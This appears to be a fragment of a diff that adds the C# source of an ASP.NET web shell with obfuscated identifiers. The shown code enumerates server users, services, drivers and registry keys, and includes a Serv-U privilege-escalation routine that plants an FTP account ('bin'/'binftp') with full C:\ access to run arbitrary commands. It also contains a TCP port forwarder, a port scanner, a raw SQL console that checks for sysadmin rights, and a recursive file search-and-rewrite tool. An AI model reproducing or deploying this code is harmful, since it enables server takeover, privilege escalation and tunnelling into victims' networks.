+td.Text=dt.Rows[j]["ProcessID"].ToString(); +tr.Controls.Add(td); +} +if(i==3) +{ +td.Text=dt.Rows[j]["Name"].ToString(); +tr.Controls.Add(td); +} +if(i==4) +{ 
+td.Text=dt.Rows[j]["PathName"].ToString(); +tr.Controls.Add(td); +} +if(i==5) +{ +string kOIo=dt.Rows[j]["State"].ToString(); +if(kOIo=="Running") +{ +td.Text="<font color=green>"+kOIo+"</font>"; +} +else +{ +td.Text="<font color=red>"+kOIo+"</font>"; +} +tr.Controls.Add(td); +} +if(i==6) +{ +td.Text=dt.Rows[j]["StartMode"].ToString(); +tr.Controls.Add(td); +} +} +vHCs.Controls.Add(tr); +} +} +catch(Exception error) +{ +oHpF(); +} +} +public void PLd() +{ +try +{ +WICxe(); +xWVQ.Visible=true; +Bin_H2_Title.InnerText="User Information >>"; +DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString()); +foreach(DirectoryEntry child in TWQ.Children) +{ +foreach(string name in child.Properties.PropertyNames) +{ +PropertyValueCollection pvc=child.Properties[name]; +int c=pvc.Count; +for(int i=0;i<c;i++) +{ +if(name!="objectSid" && name!="Parameters" && name!="LoginHours") +{ +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +TableCell td=new TableCell(); +td.Text=name; +tr.Controls.Add(td); +TableCell td1=new TableCell(); +td1.Text=pvc[i].ToString(); +tr.Controls.Add(td1); +VPa.Controls.Add(tr); +} +} +} +TableRow trn=new TableRow(); +for(int x=1;x<3;x++) +{ +TableCell tdn=new TableCell(); +tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;"; +trn.Controls.Add(tdn); +VPa.Controls.Add(trn); +} +} +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public void iLVUT() +{ +try +{ +WICxe(); +xWVQ.Visible=true; +Bin_H2_Title.InnerText="User Information >>"; +DataTable user=cCf("Win32_UserAccount"); +for(int i=0;i<user.Rows.Count;i++) +{ +for(int j=0;j<user.Columns.Count;j++) +{ +string bg=OKM(); +TableRow tr=new TableRow(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +TableCell td=new TableCell(); 
+td.Text=user.Columns[j].ToString(); +tr.Controls.Add(td); +TableCell td1=new TableCell(); +td1.Text=user.Rows[i][j].ToString(); +tr.Controls.Add(td1); +VPa.Controls.Add(tr); +} +TableRow trn=new TableRow(); +for(int x=1;x<3;x++) +{ +TableCell tdn=new TableCell(); +tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;"; +trn.Controls.Add(tdn); +VPa.Controls.Add(trn); +} +} +} +catch(Exception error) +{ +PLd(); +} +} +public void pDVM() +{ +try +{ +RegistryKey EeZ=Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"); +string IKjwH=DdmPl(EeZ,"PortNumber"); +RegistryKey izN=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor"); +int cpu=izN.SubKeyCount; +RegistryKey mQII=Registry.LocalMachine.OpenSubKey(@"HARDWARE\DESCRIPTION\System\CentralProcessor\0\"); +string NPPZ=DdmPl(mQII,"ProcessorNameString"); +WICxe(); +ghaB.Visible=true; +Bin_H2_Title.InnerText="System Information >>"; +Bin_H2_Mac.InnerText="MAC Information >>"; +Bin_H2_Driver.InnerText="Driver Information >>"; +StringBuilder yEwc=new StringBuilder(); +StringBuilder hwJeS=new StringBuilder(); +StringBuilder jXkaE=new StringBuilder(); +yEwc.Append("<li><u>Server Domain : </u>"+Request.ServerVariables["SERVER_NAME"]+"</li>"); +yEwc.Append("<li><u>Server Ip : </u>"+Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"</li>"); +yEwc.Append("<li><u>Terminal Port : </u>"+IKjwH+"</li>"); +yEwc.Append("<li><u>Server OS : </u>"+Environment.OSVersion+"</li>"); +yEwc.Append("<li><u>Server Software : </u>"+Request.ServerVariables["SERVER_SOFTWARE"]+"</li>"); +yEwc.Append("<li><u>Server UserName : </u>"+Environment.UserName+"</li>"); +yEwc.Append("<li><u>Server Time : </u>"+System.DateTime.Now.ToString()+"</li>"); +yEwc.Append("<li><u>Server TimeZone : </u>"+cCf("Win32_TimeZone").Rows[0]["Caption"]+"</li>"); +DataTable BIOS=cCf("Win32_BIOS"); +yEwc.Append("<li><u>Server BIOS : 
</u>"+BIOS.Rows[0]["Manufacturer"]+" : "+BIOS.Rows[0]["Name"]+"</li>"); +yEwc.Append("<li><u>CPU Count : </u>"+cpu.ToString()+"</li>"); +yEwc.Append("<li><u>CPU Version : </u>"+NPPZ+"</li>"); +DataTable upM=cCf("Win32_PhysicalMemory"); +Int64 oZnZV=0; +for(int i=0;i<upM.Rows.Count;i++) +{ +oZnZV+=Int64.Parse(upM.Rows[0]["Capacity"].ToString()); +} +yEwc.Append("<li><u>Server upM : </u>"+mTG(oZnZV)+"</li>"); +DataTable dOza=cCf("Win32_NetworkAdapterConfiguration"); +for(int i=0;i<dOza.Rows.Count;i++) +{ +hwJeS.Append("<li><u>Server MAC"+i+" : </u>"+dOza.Rows[i]["Caption"]+"</li>"); +if(dOza.Rows[i]["MACAddress"]!=string.Empty) +{ +hwJeS.Append("<li style=\"list-style:none;\"><u>Address : </u>"+dOza.Rows[i]["MACAddress"]+"</li>"); +} +} +DataTable Driver=cCf("Win32_SystemDriver"); +for (int i=0; i<Driver.Rows.Count; i++) +{ +jXkaE.Append("<li><u class='u1'>Server Driver"+i+" : </u><u class='u2'>"+Driver.Rows[i]["Caption"]+"</u> "); +if (Driver.Rows[i]["PathName"]!=string.Empty) +{ +jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]); +} +else +{ +jXkaE.Append("No path information"); +} +jXkaE.Append("</li>"); +} +Bin_Ul_Sys.InnerHtml=yEwc.ToString(); +Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString(); +Bin_Ul_Driver.InnerHtml=jXkaE.ToString(); +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public void ADCpk() +{ +WICxe(); +APl.Visible=true; +Bin_H2_Title.InnerText="Serv-U Exec >>"; +} +public void lDODR() +{ +string JGGg=string.Empty; +string user=dNohJ.Value; +string pass=NMd.Value; +int port=Int32.Parse(HlQl.Value); +string cmd=mHbjB.Value; +string CRtK="user "+user+"\r\n"; +string jnNG="pass "+pass+"\r\n"; +string site="SITE MAINTENANCE\r\n"; +string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n"; +string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n"; +string 
iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n"; +string zexn="QUIT\r\n"; +UHlA.Visible=true; +try +{ +tcp.Connect("127.0.0.1",port); +tcp.ReceiveBufferSize=1024; +NS=tcp.GetStream(); +Rev(NS); +ZJiM(NS,CRtK); +Rev(NS); +ZJiM(NS,jnNG); +Rev(NS); +ZJiM(NS,site); +Rev(NS); +ZJiM(NS,mtoJb); +Rev(NS); +ZJiM(NS,sutI); +Rev(NS); +ZJiM(NS,iVDT); +Rev(NS); +Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>"; +zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521); +NS1=zvxm.GetStream(); +Rev(NS1); +ZJiM(NS1,"user bin\r\n"); +Rev(NS1); +ZJiM(NS1,"pass binftp\r\n"); +Rev(NS1); +ZJiM(NS1,"site exec "+cmd+"\r\n"); +Rev(NS1); +ZJiM(NS1,"quit\r\n"); +Rev(NS1); +zvxm.Close(); +ZJiM(NS,mtoJb); +Rev(NS); +tcp.Close(); +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +protected void Rev(NetworkStream instream) +{ +string FTBtf=string.Empty; +if(instream.CanRead) +{ +byte[] uPZ=new byte[1024]; +do +{ +System.Threading.Thread.Sleep(50); +int len=instream.Read(uPZ,0,uPZ.Length); +FTBtf+=Encoding.Default.GetString(uPZ,0,len); +} +while(instream.DataAvailable); +} +Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>"; +} +protected void ZJiM(NetworkStream instream,string Sendstr) +{ +if(instream.CanWrite) +{ +byte[] uPZ=Encoding.Default.GetBytes(Sendstr); +instream.Write(uPZ,0,uPZ.Length); +} +Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>"; +} +public void xFhz() +{ +WICxe(); +kkHN.Visible=true; 
+Bin_H2_Title.InnerText="RegShell >>"; +string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG"; +vyX.Text=""; +foreach(string rootkey in txc.Split('|')) +{ +vyX.Text+="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a> | "; +} +lFAvw(); +} +protected void lFAvw() +{ +qPdI.Text=""; +string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG"; +TableRow tr; +TableCell tc; +foreach(string rootkey in txc.Split('|')) +{ +tr=new TableRow(); +tc=new TableCell(); +string bg=OKM(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tc.Width=Unit.Parse("40%"); +tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(rootkey)+"')\">"+rootkey+"</a>"; +tr.Cells.Add(tc); +tc=new TableCell(); +tc.Width=Unit.Parse("60%"); +tc.Text="<RootKey>"; +tr.Cells.Add(tc); +pLWD.Rows.Add(tr); +} +} +protected void tpRQ(string Reg_Path) +{ +if(!Reg_Path.EndsWith("\\")) +{ +Reg_Path=Reg_Path+"\\"; +} +qPdI.Text=Reg_Path; +string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$",""); +cJG=Regex.Replace(cJG,@"\\+","\\"); +TableRow tr=new TableRow(); +TableCell tc=new TableCell(); +string bg=OKM(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(cJG)+"')\">Parent Key</a>"; +tc.Attributes["colspan"]="2" ; +tr.Cells.Add(tc); +pLWD.Rows.Add(tr); +try +{ +string subpath; +string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1); +RegistryKey rk=null; +RegistryKey sk; +if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE")) +{ +rk=Registry.LocalMachine; +} +else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT")) +{ +rk=Registry.ClassesRoot; +} +else if(Reg_Path.StartsWith("HKEY_CURRENT_USER")) +{ +rk=Registry.CurrentUser; +} 
+else if(Reg_Path.StartsWith("HKEY_USERS")) +{ +rk=Registry.Users; +} +else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG")) +{ +rk=Registry.CurrentConfig; +} +if(kDgkX.Length>1) +{ +sk=rk.OpenSubKey(kDgkX); +} +else +{ +sk=rk; +} +foreach(string innerSubKey in sk.GetSubKeyNames()) +{ +tr=new TableRow(); +tc=new TableCell(); +bg=OKM(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tc.Width=Unit.Parse("40%"); +tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Regread','"+MVVJ(Reg_Path+innerSubKey)+"')\">"+innerSubKey+"</a>"; +tr.Cells.Add(tc); +tc=new TableCell(); +tc.Width=Unit.Parse("60%"); +tc.Text="<SubKey>"; +tr.Cells.Add(tc); +pLWD.Rows.Add(tr); +} +TableRow cKVA=new TableRow(); +cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;"; +cKVA.Attributes["bgcolor"]="#dddddd"; +TableCell JlmW=new TableCell(); +JlmW.Attributes["colspan"]="2" ; +JlmW.Attributes["height"]="5"; +cKVA.Cells.Add(JlmW); +pLWD.Rows.Add(cKVA); +foreach(string strValueName in sk.GetValueNames()) +{ +tr=new TableRow(); +tc=new TableCell(); +bg=OKM(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tc.Width=Unit.Parse("40%"); +tc.Text=strValueName; +tr.Cells.Add(tc); +tc=new TableCell(); +tc.Width=Unit.Parse("60%"); +tc.Text=DdmPl(sk,strValueName); +tr.Cells.Add(tc); +pLWD.Rows.Add(tr); +} +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +public string DdmPl(RegistryKey sk,string strValueName) +{ +object uPZ; +string RaTGr=""; +try +{ +uPZ=sk.GetValue(strValueName,"NULL"); +if(uPZ.GetType()==typeof(byte[])) +{ +foreach(byte tmpbyte in(byte[])uPZ) +{ +if((int)tmpbyte<16) +{ +RaTGr+="0"; +} +RaTGr+=tmpbyte.ToString("X"); +} +} +else if(uPZ.GetType()==typeof(string[])) +{ +foreach(string tmpstr in(string[])uPZ) +{ +RaTGr+=tmpstr; +} +} +else +{ +RaTGr=uPZ.ToString(); +} +} +catch(Exception 
error) +{ +xseuB(error.Message); +} +return RaTGr; +} +public void vNCHZ() +{ +WICxe(); +YwLB.Visible=true; +Bin_H2_Title.InnerText="PortScan >>"; +} +public void rAhe() +{ +WICxe(); +iDgmL.Visible=true; +dQIIF.Visible=false; +Bin_H2_Title.InnerText="DataBase >>"; +} +protected void OUj() +{ +if(Dtdr.State==ConnectionState.Closed) +{ +try +{ +Dtdr.ConnectionString=MasR.Text; +Kkvb.Connection=Dtdr; +Dtdr.Open(); +} +catch(Exception Error) +{ +xseuB(Error.Message); +} +} +} +protected void fUzE() +{ +if(Dtdr.State==ConnectionState.Open) +Dtdr.Close(); +Dtdr.Dispose(); +Kkvb.Dispose(); +} +public DataTable CYUe(string sqlstr) +{ +OleDbDataAdapter da=new OleDbDataAdapter(); +DataTable Dstog=new DataTable(); +try +{ +OUj(); +Kkvb.CommandType=CommandType.Text; +Kkvb.CommandText=sqlstr; +da.SelectCommand=Kkvb; +da.Fill(Dstog); +} +catch(Exception) +{ +} +finally +{ +fUzE(); +} +return Dstog; +} +public DataTable[] Bin_Data(string query) +{ +ArrayList list=new ArrayList(); +try +{ +string str; +OUj(); +query=query+"\r\n"; +MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query); +int EmRX=0; +for(int i=0;i<gcod.Count;i++) +{ +Match FJD=gcod[i]; +str=query.Substring(EmRX,FJD.Index-EmRX); +if(str.Trim().Length>0) +{ +OleDbDataAdapter FgzeQ=new OleDbDataAdapter(); +Kkvb.CommandType=CommandType.Text; +Kkvb.CommandText=str.Trim(); +FgzeQ.SelectCommand=Kkvb; +DataSet cDPp=new DataSet(); +FgzeQ.Fill(cDPp); +for(int j=0;j<cDPp.Tables.Count;j++) +{ +list.Add(cDPp.Tables[j]); +} +} +EmRX=FJD.Index+3; +} +str=query.Substring(EmRX,query.Length-EmRX); +if(str.Trim().Length>0) +{ +OleDbDataAdapter VwB=new OleDbDataAdapter(); +Kkvb.CommandType=CommandType.Text; +Kkvb.CommandText=str.Trim(); +VwB.SelectCommand=Kkvb; +DataSet arG=new DataSet(); +VwB.Fill(arG); +for(int k=0;k<arG.Tables.Count;k++) +{ +list.Add(arG.Tables[k]); +} +} +} +catch(SqlException e) +{ +xseuB(e.Message); +rom.Visible=false; +} +return(DataTable[])list.ToArray(typeof(DataTable)); +} +public void 
JIAKU(string instr) +{ +try +{ +OUj(); +Kkvb.CommandType=CommandType.Text; +Kkvb.CommandText=instr; +Kkvb.ExecuteNonQuery(); +} +catch(Exception e) +{ +xseuB(e.Message); +} +} +public void dwgT() +{ +try +{ +OUj(); +if(WYmo.SelectedItem.Text=="MSSQL") +{ +if(Pvf.SelectedItem.Value!="") +{ +Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString()); +} +} +DataTable[] jxF=null; +jxF=Bin_Data(jHIy.InnerText); +if(jxF!=null && jxF.Length>0) +{ +for(int j=0;j<jxF.Length;j++) +{ +rom.PreRender+=new EventHandler(lRavM); +rom.DataSource=jxF[j]; +rom.DataBind(); +for(int i=0;i<rom.Items.Count;i++) +{ +string bg=OKM(); +rom.Items[i].CssClass=bg; +rom.Items[i].Attributes["onmouseover"]="this.className='focus';"; +rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';"; +} +} +} +else +{ +rom.DataSource=null; +rom.DataBind(); +} +rom.Visible=true; +} +catch(Exception e) +{ +xseuB(e.Message); +rom.Visible=false; +} +} +public void xTZY() +{ +try +{ +if(WYmo.SelectedItem.Text=="MSSQL") +{ +if(Pvf.SelectedItem.Value=="") +{ +rom.DataSource=null; +rom.DataBind(); +return; +} +} +OUj(); +DataTable zKvOw=new DataTable(); +DataTable jxF=new DataTable(); +DataTable baVJV=new DataTable(); +if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="") +{ +Dtdr.ChangeDatabase(Pvf.SelectedItem.Text); +} +zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" }); +jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" }); +foreach(DataRow dr in zKvOw.Rows) +{ +jxF.ImportRow(dr); +} +jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID"); +rom.PreRender+=new EventHandler(lRavM); +rom.DataSource=jxF; +rom.DataBind(); +for(int i=0;i<rom.Items.Count;i++) +{ +string bg=OKM(); +rom.Items[i].CssClass=bg; +rom.Items[i].Attributes["onmouseover"]="this.className='focus';"; 
+rom.Items[i].Attributes["onmouseout"]="this.className='"+bg+"';"; +} +rom.Visible=true; +} +catch(Exception e) +{ +xseuB(e.Message); +rom.Visible=false; +} +} +private void lRavM(object sender,EventArgs e) +{ +DataGrid d=(DataGrid)sender; +foreach(DataGridItem item in d.Items) +{ +foreach(TableCell t in item.Cells) +{ +t.Text=t.Text.Replace("<","<").Replace(">",">"); +} +} +} +public void vCf() +{ +dQIIF.Visible=true; +try +{ +jHIy.InnerHtml=string.Empty; +if(WYmo.SelectedItem.Text=="MSSQL") +{ +rom.Visible=false; +uXevN.Visible=true; +irTU.Visible=true; +OUj(); +DataTable ver=CYUe(@"SELECT @@VERSION"); +DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases"); +DataTable cdb=CYUe(@"SELECT DB_NAME()"); +DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER('sysadmin')"); +DataTable YKrm=CYUe(@"SELECT IS_MEMBER('db_owner')"); +string jHlh=ver.Rows[0][0].ToString(); +string dbo=string.Empty; +if(YKrm.Rows[0][0].ToString()=="1") +{ +dbo="db_owner"; +} +else +{ +dbo="public"; +} +if(rol.Rows[0][0].ToString()=="1") +{ +dbo="<font color=blue>sa</font>"; +} +string db_name=string.Empty; +foreach(ListItem item in FGEy.Items) +{ + if(item.Selected=true) + { + item.Selected=false; + } +} +Pvf.Items.Clear(); +Pvf.Items.Add("-- Select a DataBase --"); +Pvf.Items[0].Value=""; +for(int i=0;i<dbs.Rows.Count;i++) +{ +db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+" | "; +Pvf.Items.Add(dbs.Rows[i][0].ToString()); +} +irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>"; +} +else +{ +uXevN.Visible=false; +irTU.Visible=false; +xTZY(); +} +} +catch(Exception e) +{ +dQIIF.Visible=false; +} +} +public void MHLv() +{ +WICxe(); +hOWTm.Visible=true; +Bin_H2_Title.InnerText="PortMap >>"; +} +public class PortForward +{ +public string Localaddress; +public int LocalPort; +public string RemoteAddress; +public int 
RemotePort; +string type; +Socket ltcpClient; +Socket rtcpClient; +Socket server; +byte[] DPrPL=new byte[2048]; +byte[] wvZv=new byte[2048]; +public struct session +{ +public Socket rdel; +public Socket ldel; +public int llen; +public int rlen; +} +public static IPEndPoint mtJ(string host,int port) +{ +IPEndPoint iep=null; +IPHostEntry aGN=Dns.Resolve(host); +IPAddress rmt=aGN.AddressList[0]; +iep=new IPEndPoint(rmt,port); +return iep; +} +public void Start(string Rip,int Rport,string lip,int lport) +{ +try +{ +LocalPort=lport; +RemoteAddress=Rip; +RemotePort=Rport; +Localaddress=lip; +rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp); +ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp); +rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient); +} +catch (Exception ex) { } +} +protected void iiGFO(IAsyncResult ar) +{ +try +{ +session RKXy=new session(); +RKXy.ldel=ltcpClient; +RKXy.rdel=rtcpClient; +ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy); +} +catch (Exception ex) { } +} +protected void VTp(IAsyncResult ar) +{ +try +{ +session RKXy=(session)ar.AsyncState; +ltcpClient.EndConnect(ar); +RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy); +RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy); +} +catch (Exception ex) { } +} +private void LFYM(IAsyncResult ar) +{ +try +{ +session RKXy=(session)ar.AsyncState; +int Ret=RKXy.rdel.EndReceive(ar); +if (Ret>0) +ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy); +else lyTOK(); +} +catch (Exception ex) { } +} +private void JTcp(IAsyncResult ar) +{ +try +{ +session RKXy=(session)ar.AsyncState; +RKXy.ldel.EndSend(ar); +RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy); +} +catch (Exception ex) { } +} +private void xPS(IAsyncResult ar) +{ 
+try +{ +session RKXy=(session)ar.AsyncState; +int Ret=RKXy.ldel.EndReceive(ar); +if (Ret>0) +RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy); +else lyTOK(); +} +catch (Exception ex) { } +} +private void IZU(IAsyncResult ar) +{ +try +{ +session RKXy=(session)ar.AsyncState; +RKXy.rdel.EndSend(ar); +RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy); +} +catch (Exception ex) { } +} +public void lyTOK() +{ +try +{ +if (ltcpClient!=null) +{ +ltcpClient.Close(); +} +if (rtcpClient!=null) +rtcpClient.Close(); +} +catch (Exception ex) { } +} +} +protected void vuou() +{ +PortForward gYP=new PortForward(); +gYP.lyTOK(); +} +protected void ruQO() +{ +PortForward gYP=new PortForward(); +gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value)); +} +public string mRDl(string instr) +{ +string tmp=null; +try +{ +tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString(); +} +catch(Exception e) +{ +} +return tmp; +} +public void VikG() +{ +string[] OTV=lOmX.Text.ToString().Split(','); +for(int i=0;i<OTV.Length;i++) +{ +IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i]))); +} +try +{ +Thread[] kbXY=new Thread[IVc.Count]; +int sdO=0; +for(sdO=0;sdO<IVc.Count;sdO++) +{ +kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan)); +kbXY[sdO].Start(); +} +for(sdO=0;sdO<kbXY.Length;sdO++) +kbXY[sdO].Join(); +} +catch +{ +} +} +public class ScanPort +{ +private string _ip=""; +private int jTdO=0; +private TimeSpan _timeSpent; +private string QGcH="Not scanned"; +public string ip +{ +get { return _ip;} +} +public int port +{ +get { return jTdO;} +} +public string status +{ +get { return QGcH;} +} +public TimeSpan timeSpent +{ +get { return _timeSpent;} +} +public ScanPort(string ip,int port) +{ +_ip=ip; +jTdO=port; +} +public void Scan() +{ +TcpClient iYap=new TcpClient(); +DateTime qYZT=DateTime.Now; +try +{ +iYap.Connect(_ip,jTdO); +iYap.Close(); +QGcH="<font 
color=green><b>Open</b></font>"; +} +catch +{ +QGcH="<font color=red><b>Close</b></font>"; +} +_timeSpent=DateTime.Now.Subtract(qYZT); +} +} +public static void YFcNP(System.Web.UI.Page page) +{ +page.RegisterHiddenField("__EVENTTARGET",""); +page.RegisterHiddenField("__FILE",""); +string s=@"<script language=Javascript>"; +s+=@"function Bin_PostBack(eventTarget,eventArgument)"; +s+=@"{"; +s+=@"var theform=document.forms[0];"; +s+=@"theform.__EVENTTARGET.value=eventTarget;"; +s+=@"theform.__FILE.value=eventArgument;"; +s+=@"theform.submit();"; +s+=@"} "; +s+=@"</scr"+"ipt>"; +page.RegisterStartupScript("",s); +} +protected void PPtK(object sender,EventArgs e) +{ +WICxe(); +yhv.Visible=true; +Bin_H2_Title.InnerText="File Search >>"; +NaLJ.Value=Request.PhysicalApplicationPath; +oJiym.Visible=false; +} +protected void NBy(object sender,EventArgs e) +{ +DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value); +if(!GQMM.Exists) +{ +xseuB("Path invalid ! "); +return; +} +oog(GQMM); +xseuB("Search completed ! 
"); +} +public void oog(DirectoryInfo dir) +{ +try +{ +oJiym.Visible=true; +foreach(FileInfo Bin_Files in dir.GetFiles()) +{ +try +{ +if(Bin_Files.FullName==Request.PhysicalPath) +{ +continue; +} +if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase)) +{ +continue; +} +if(Ven.SelectedItem.Value=="name") +{ +if(rAQ.Checked) +{ +if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase)) +{ +FJvQ(Bin_Files); +} +} +else +{ +if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1) +{ +Response.Write(Bin_Files.FullName); +FJvQ(Bin_Files); +} +} +} +else +{ +StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default); +string ava=sr.ReadToEnd(); +sr.Close(); +if(rAQ.Checked) +{ +if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase)) +{ +FJvQ(Bin_Files); +if(YZw.Checked) +{ +ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase); +StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default); +sw.Write(ava); +sw.Close(); +} +} +} +else +{ +if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1) +{ +FJvQ(Bin_Files); +if(YZw.Checked) +{ +ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text); +StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default); +sw.Write(ava); +sw.Close(); +} +} +} +} +} +catch(Exception ex) +{ +xseuB(ex.Message); +continue; +} +} +foreach(DirectoryInfo subdir in dir.GetDirectories()) +{ +oog(subdir); +} +} +catch(Exception ex) +{ +xseuB(ex.Message); +} +} +public void FJvQ(FileInfo objfile) +{ +TableRow tr=new TableRow(); +TableCell tc=new TableCell(); +string bg=OKM(); +tr.Attributes["onmouseover"]="this.className='focus';"; +tr.CssClass=bg; +tr.Attributes["onmouseout"]="this.className='"+bg+"';"; +tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>"; +tr.Cells.Add(tc); +tc=new TableCell(); +tc.Text=objfile.LastWriteTime.ToString(); 
